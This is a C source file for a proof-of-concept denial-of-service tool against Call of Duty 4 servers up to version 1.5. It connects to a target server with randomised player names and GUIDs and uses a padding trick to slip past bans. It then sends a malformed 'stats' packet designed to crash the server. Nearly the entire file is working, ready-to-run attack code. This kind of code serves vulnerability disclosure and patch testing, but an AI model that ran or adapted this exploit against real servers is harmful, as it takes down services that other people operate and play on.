/*
    Copyright 2008 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <time.h>
#include <ctype.h>
#include "q3huff.h"

#ifdef WIN32
    #include <winsock.h>
    #include <io.h>
    #include "winerr.h"

    #define close       closesocket
    #define sleep       Sleep
    #define usleep      sleep
    #define ONESEC      1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC      1
    #define stristr     strcasestr
    #define stricmp     strcasecmp
    #define strnicmp    strncasecmp
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define BUFFSZ      8192
#define PORT        28960
#define MORESZ      1100
#define INFO        "\xff\xff\xff\xff" "getinfo xxx\n"
#define GETCH       "\xff\xff\xff\xff" "getchallenge\n"



typedef struct {
    int     protocol;
    int     punkbuster;
    int     punkbuster2;
    int     password;
    int     compression;
    int     snaps;
    int     rate;
    int     internet;
    u8      *cdkey;
    u8      *mod;
    u8      *guid;
    u8      *pbguid;
} client_t;



void activate_q3unban(u8 *more);
u8 *correct_user_parameters(u8 *mod);
#define scpy(a,b)   sprintf(a, "%.*s", sizeof(a) - 1, b);
void q3info(struct sockaddr_in *peer, client_t *client);
u8 *show_print_msg(u8 *data);
int get_new_parameters(u8 *data, u8 *more, int *snaps, int *rate);
void fgetz(u8 *buff, int size, FILE *fd);
int sendrecv(int sd, struct sockaddr_in *peer, u8 *in, int insz, u8 *out, int outsz);
int build_connect(u8 *buff, u8 *pb2, ...);
int handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...);
int rnds(u8 *data, int len, u32 *seed);
void rndh(u8 *data, int len, u32 *seed, int ccase);
int timeout(int sock);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    client_t    client;
    struct  sockaddr_in peer,
                        peerl;
    u32     seed;
    int     sd,
            i,
            len,
            challenge,
            autounban       = 0,
            changed_comp    = 0,
            timewait        = 5;
    u16     port            = PORT,
            qport;
    u8      buff[BUFFSZ+1],
            more[MORESZ+1]  = "",
            password[64]    = "",
            *nick           = NULL,
            *p4             = buff + 4,
            *host;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Call of Duty 4 <= 1.5 stats in-game Denial of Service "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <server> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

        /* all the code is from my q3fill tool */

    client.protocol     = 0;
    client.punkbuster   = 0;
    client.punkbuster2  = 0;
    client.password     = 0;
    client.compression  = 0;
    client.snaps        = 10;
    client.rate         = 1500;
    client.internet     = 0;
    client.cdkey        = "";
    client.mod          = "";
    client.guid         = malloc(33);
    client.guid[0]      = 0;
    client.pbguid       = malloc(33);
    client.pbguid[0]    = 0;

    host = argv[1];
    if(argc > 2) port = atoi(argv[2]);
    seed = time(NULL);

    peer.sin_addr.s_addr  = resolv(host);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    peerl.sin_addr.s_addr = INADDR_ANY;
    peerl.sin_port        = htons(seed & 0x7fff);
    peerl.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    q3info(&peer, &client);

    if(autounban)  activate_q3unban(more);

    for(;;) {
        printf("\n     Player: ");

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        do {
            peerl.sin_port = htons((ntohs(peerl.sin_port) + 1) & 0x7fff);
        } while(bind(sd, (struct sockaddr *)&peerl, sizeof(peerl)) < 0);

        len = sendrecv(sd, &peer, GETCH, sizeof(GETCH) - 1, buff, BUFFSZ);
        if(len < 0) std_err();

        if(strstr(p4, "AUTH")) {
            printf("\n"
                "Error: %s\n"
                "This error means you must send your CDKEY to the authorization server of the\n"
                "game running on the remote server.\n"
                "This tool is based only on the authorization protocol of Quake 3\n"
                "Retry again for some times and then if you are testing a Quake 3 server, try\n"
                "using the -i flag\n"
                "\n", show_print_msg(p4));
            exit(1);
        } else if(!stristr(p4, "challengeResponse")) {
            printf("\n"
                "Error: %s\n"
                "An error at this point means that you cannot join the server due to\n"
                "authorization problems\n"
                "This proof-of-concept doesn't implement the cdkey handling instructions so use\n"
                "the cod4statz_sudp plugin for sudppipe available in the Proof-of-Concept\n"
                "section of my website for testing your internet server\n"
                "\n", show_print_msg(p4));
            exit(1);
        }

        challenge = atoi(buff + 22);

        if(!client.internet && !client.punkbuster2) {
            rndh(client.guid, 32, &seed, 1);
        }
        if(!client.punkbuster2) {
            rndh(client.pbguid, 32, &seed, 0);
        }

        if(nick) free(nick);
        rnds(buff, 32, &seed);
        nick = strdup(buff);
        printf(" \"%s\" ", nick);

        qport = ntohs(peerl.sin_port);

        len = build_connect(
            buff,
            client.pbguid,
            "cg_predictItems",  "%i",   1,
            "cl_punkbuster",    "%i",   client.punkbuster,
            "cl_voice",         "%i",   0,
            "cl_wwwDownload",   "%i",   1,
            "rate",             "%i",   client.rate,
            "snaps",            "%i",   client.snaps,
            "name",             "%s",   nick,
            "protocol",         "%i",   client.protocol,
            "challenge",        "%i",   challenge,
            "qport",            "%i",   qport,
            "password",         "%s",   password,
            "g_password",       "%s",   password,
            NULL,               "%s",   client.mod,
            NULL,               "%s",   more,
            NULL,               NULL,   NULL);

        //if(verbose) printf("\n%s\n", buff);
        if(client.compression) len = Huff_CompressPacket(buff, 12, len);

        len = sendrecv(sd, &peer, buff, len, buff, BUFFSZ);
        if(len < 0) std_err();

        while(stristr(p4, "challengeResponse")) {
            len = sendrecv(sd, &peer, NULL, 0, buff, BUFFSZ);
            if(len < 0) std_err();
        }

        if(stristr(p4, "full")) {
            printf("\n- %s\n", show_print_msg(p4));
            for(i = timewait; i; i--) {
                printf("\r%4d", i);
                sleep(ONESEC);
            }

        } else if(stristr(p4, "password")) {
            printf("\n- %s\n", show_print_msg(p4));
            printf("\n- server is protected, insert the required password:\n  ");
            fgetz(password, sizeof(password), stdin);

        } else if(stristr(p4, "maximum connections")) {
            printf("\n- %s\n", show_print_msg(p4));
            for(i = timewait; i; i--) {
                printf("\r%4d", i);
                sleep(ONESEC);
            }

        } else if(stristr(p4, "banned") && !autounban) {
            printf("\n- %s\n", show_print_msg(p4));
            activate_q3unban(more);
            autounban = 1;

        } else if(!stristr(p4, "connectResponse")) {
            printf("\n- %s\n", show_print_msg(p4));
            if(stristr(p4, "protocol")) {
                if(client.compression) {
                    printf("This error means you must disable compression (-c flag)\n");
                } else {
                    printf("This error means you must enable compression (do not use the -c flag)\n");
                }
                exit(1);
            }

            if(get_new_parameters(p4, more, &client.snaps, &client.rate) < 0) {
                if(changed_comp) exit(1);
                changed_comp = 1;
                client.compression = client.compression ? 0 : 1;
                printf("- now I try %s the compression\n", client.compression ? "enabling" : "disabling");
            }

        } else {    // all ok
            printf("\n- send the malformed stats packet\n");
            memset(buff, 0x00, 1253);
            memcpy(buff, "\xff\xff\xff\xff" "stats\0", 10);
            buff[10] = qport;
            buff[11] = qport >> 8;
            buff[12] = 7;
            len = sendrecv(sd, &peer, buff, 1253, NULL, 0);
            if(len < 0) std_err();

            for(i = 20; i >= 0; i--) {
                len = sendrecv(sd, &peer, NULL, 0, buff, BUFFSZ);
                if(len < 0) break;
            }
            if(i < 0) {
                printf("\n"
                    "Error: the server continues to send packets, it could be patched or the stats\n"
                    "       packet has not been accepted. in this case try to relaunch this tool\n"
                    "       now and if fails retry within some minutes\n");
            } else {
                printf("\n- the server should be down, check it manually or relaunch this tool\n");
            }
            close(sd);
            break;
        }
        close(sd);
    }

    return(0);
}



void activate_q3unban(u8 *more) {
    int     len;

    printf("\n- activated auto unbanning trick\n");
    len = MORESZ - strlen(more);
    memset(more + strlen(more), 'A', len);
    more[strlen(more)]       = '\\';
    more[MORESZ - (len / 2)] = '\\';
    more[MORESZ]             = 0;
}



u8 *correct_user_parameters(u8 *mod) {
    int     len;

    if(!mod[0]) return(mod);
    while(mod[0] == '\\') mod++;

    len = strlen(mod);
    for(len--; len >= 0; len--) {
        if(mod[len] != '\\') {
            mod[len + 1] = '\0';
            break;
        }
    }

    return(mod);
}



void q3info(struct sockaddr_in *peer, client_t *client) {
    int     sd,
            len;
    u8      buff[BUFFSZ],
            *pb,
            *proto,
            *pwd;

    printf("- retrieve informations\n");
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    len = sendrecv(sd, peer, INFO, sizeof(INFO) - 1, buff, BUFFSZ);
    if(len < 0) std_err();
    close(sd);

    handle_info(buff, len, 1, '\\', 4, 0,
        "sv_punkbuster", &pb,
        "punkbuster",    &pb,
        "pb",            &pb,
        "protocol",      &proto,
        "needpass",      &pwd,
        "pswrd",         &pwd,
        NULL, NULL);

    if(pb)    client->punkbuster = atoi(pb);
    if(proto) client->protocol   = atoi(proto);
    if(pwd)   client->password   = atoi(pwd);

    printf("\n"
        "- parameters in use:\n"
        "  compression   %s\n"
        "  protocol      %d\n"
        "  punkbuster    %s\n"
        "  password      %s\n"
        "  key/guid      %s\n",
        client->compression ? "on" : "off",
        client->protocol,
        client->punkbuster  ? "on" : "off",
        client->password    ? "on" : "off",
        client->internet ? (char *)client->cdkey : "random");

    if(client->punkbuster2) {
        printf(
            "  guid          %s\n"
            "  pb_guid       %s\n",
            client->guid,
            client->pbguid);
    }
}



u8 *show_print_msg(u8 *data) {
    u8     *p;

    p = data + strlen(data) - 1;
    while((p >= data) && (*p <= '\r')) p--;
    *(p + 1) = 0;

    if(!strnicmp(data, "print\n", 6)) return(data + 6);
    return(data);
}



int get_new_parameters(u8 *data, u8 *more, int *snaps, int *rate) { // untouched function
    u8      *par,
            *val,
            *p;

    p = (u8 *)stristr(data, "your");
    if(!p) return(-1);

    printf("\n- %s\n", show_print_msg(data));

    while(*p && (*p != ' ') && (*p != '\t')) p++;       // skip word
    while(*p && ((*p == ' ') || (*p == '\t'))) p++;     // skip spaces

    par = p;                                            // parameter, for example snaps

    while(*p && (*p != ' ') && (*p != '\t')) p++;
    *p = 0;

    data = p + 1;

    p = strchr(data, ':');
    if(!p) {
        p = data + strlen(data) - 1;
        while((p >= data) && (*p != ' ') && (*p != '\t')) p--;
    }

    for(p++; *p && ((*p == ' ') || (*p == '\t')); p++); // skip spaces

    val = p;                                            // value requested by the server

    while(*p && (*p != ' ') && (*p != '\t') && (*p != '.')) p++;
    *p = 0;

    printf("- par\\val: \"%s\" \"%s\"\n", par, val);

    if(!stricmp(par, "snaps")) {
        *snaps = atoi(val);
    } else if(!stricmp(par, "rate")) {
        *rate = atoi(val);
    } else {
        p = more + strlen(more);
        if(((p - more) + 1 + strlen(par) + 1 + strlen(val)) >= MORESZ) {
            printf("\nError: the more buffer can't contain all the data\n");
            exit(1);
        }
        sprintf(p, "\\%s\\%s", par, val);
    }

    return(0);
}



int sendrecv(int sd, struct sockaddr_in *peer, u8 *in, int insz, u8 *out, int outsz) {
    int     i;

    if(in) {
        for(i = 3; i; i--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) return(-1);
            fputc('.', stdout);
            if(!timeout(sd)) break;
        }
        if(!i) {
            printf("\nError: socket timeout, no reply received (the server could be down)\n\n");
            exit(1);
        }
    }
    if(out) {
        outsz = recvfrom(sd, out, outsz, 0, NULL, NULL);
        fputc('.', stdout);
        if(outsz >= 0) out[outsz] = 0;
    }
    return(outsz);
}



int build_connect(u8 *buff, u8 *pb2, ...) {
    va_list ap;
    int     i,
            len,
            args;
    u8      **parz,
            **fmtz,
            **valz;

    va_start(ap, pb2);
    for(i = 0; ; i++) {
        va_arg(ap, u8 *);
        if(!va_arg(ap, u8 *)) break;
        va_arg(ap, u8 *);
    }
    va_end(ap);

    args = i;
    parz = malloc(args * sizeof(u8 *));
    fmtz = malloc(args * sizeof(u8 *));
    valz = malloc(args * sizeof(u8 *));

    va_start(ap, pb2);
    for(i = 0; i < args; i++) {
        parz[i] = va_arg(ap, u8 *);
        fmtz[i] = va_arg(ap, u8 *);
        valz[i] = va_arg(ap, u8 *);
    }
    va_end(ap);

    len = 0;
    len += sprintf(buff + len, "\xff\xff\xff\xff" "connect " "\"");
    for(i = 0; i < args; i++) {
        if(parz[i]) {
            if(strchr(fmtz[i], 's') && (!valz[i] || !valz[i][0])) continue;
            len += sprintf(buff + len, "\\%s\\", parz[i]);
        } else {
            if(strchr(fmtz[i], 's') && valz[i] && valz[i][0]) buff[len++] = '\\';
        }
        len += sprintf(buff + len, fmtz[i], valz[i]);
    }
    //len += sprintf(buff + len, "\"" " *%s", pb2);
    len += sprintf(buff + len, "\"");

    free(parz);
    free(valz);
    return(len);
}



int handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...) {
    va_list ap;
    int     i,
            args,
            found;
    u8      **parz,
            ***valz,
            *p,
            *limit,
            *par,
            *val;

    va_start(ap, rear);
    for(i = 0; ; i++) {
        if(!va_arg(ap, u8 *))  break;
        if(!va_arg(ap, u8 **)) break;
    }
    va_end(ap);

    args = i;
    parz = malloc(args * sizeof(u8 *));
    valz = malloc(args * sizeof(u8 **));

    va_start(ap, rear);
    for(i = 0; i < args; i++) {
        parz[i]  = va_arg(ap, u8 *);
        valz[i]  = va_arg(ap, u8 **);
        *valz[i] = NULL;
    }
    va_end(ap);

    found  = 0;
    limit  = data + datalen - rear;
    *limit = 0;
    data   += front;
    par    = NULL;
    val    = NULL;

    for(p = data; (data < limit) && p; data = p + 1, nt++) {
        p = strchr(data, chr);
        if(p) *p = 0;

        if(nt & 1) {
            if(!par) continue;
            val = data;
            printf("  %30s %s\n", par, val);

            for(i = 0; i < args; i++) {
                if(!stricmp(par, parz[i])) *valz[i] = val;
            }
        } else {
            par = data;
        }
    }

    free(parz);
    free(valz);
    return(found);
}



void fgetz(u8 *buff, int size, FILE *fd) {
    u8      *p;

    if(!fgets(buff, size, fd)) {
        rewind(fd);
        if(!fgets(buff, size, fd)) std_err();
    }
    for(p = buff; *p && (*p != '\n') && (*p != '\r'); p++);
    *p = 0;
}



int rnds(u8 *data, int len, u32 *seed) {
    u32     rnd = *seed;
    u8      *p = data;
    static const char
            table[] =
                "0123456789"
                "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz";

    len = rnd % len;
    if(len < 3) len++;

    while(len--) {
        rnd = ((rnd * 0x343FD) + 0x269EC3) >> 3;
        *p++ = table[rnd % (sizeof(table) - 1)];
    }
    *p = 0;

    *seed = rnd;
    return(p - data);
}



void rndh(u8 *data, int len, u32 *seed, int ccase) {
    u32     rnd = *seed;
    u8      *p  = data,
            *hex_table;
    static const char
            hex_table1[16] = "0123456789ABCDEF",
            hex_table2[16] = "0123456789abcdef";

    hex_table = ccase ? (u8 *)hex_table1 : (u8 *)hex_table2;

    while(len--) {
        rnd = ((rnd * 0x343FD) + 0x269EC3) >> 3;
        *p++ = hex_table[rnd & 15];
    }
    *p = 0;

    *seed = rnd;
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fdr;
    int     err;

    tout.tv_sec  = 2;
    tout.tv_usec = 0;
    FD_ZERO(&fdr);
    FD_SET(sock, &fdr);
    err = select(sock + 1, &fdr, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n\n", host);
            exit(1);
        } else host_ip = *(u32 *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


